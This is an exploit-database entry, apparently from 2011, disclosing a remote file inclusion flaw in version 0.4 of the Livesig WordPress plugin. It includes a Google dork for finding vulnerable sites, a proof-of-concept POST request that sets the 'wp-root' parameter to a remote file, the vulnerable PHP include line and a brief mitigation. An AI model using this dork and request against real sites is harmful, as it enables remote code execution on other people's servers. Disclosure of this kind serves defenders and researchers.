header-logo
Suggest Exploit
vendor:
Livesig
by:
Ben Schmidt
8.8
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Livesig
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:livesig
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Livesig WordPress plugin RFI

The Livesig Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious POST request to the livesig-ajax-backend.php file, which includes the 'wp-root' parameter. This parameter is used to include a remote file, which can be used to execute arbitrary code on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used to include files.
Source

Exploit-DB raw data:

# Exploit Title: Livesig Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/livesig
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/livesig/download/
# Version: 0.4 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/livesig/livesig-ajax-backend.php POST="wp-root=RFI&action=asdf"

---
Vulnerable Code
---
// Exit if no function specified
if( !isset( $_POST['action'] ) || '' == $_POST['action'] ) {
        echo '{ errcode: "ERR-000", errmsg: "No action specified" }';
        exit();
}

include( $_POST['wp-root'] . 'wp-config.php' );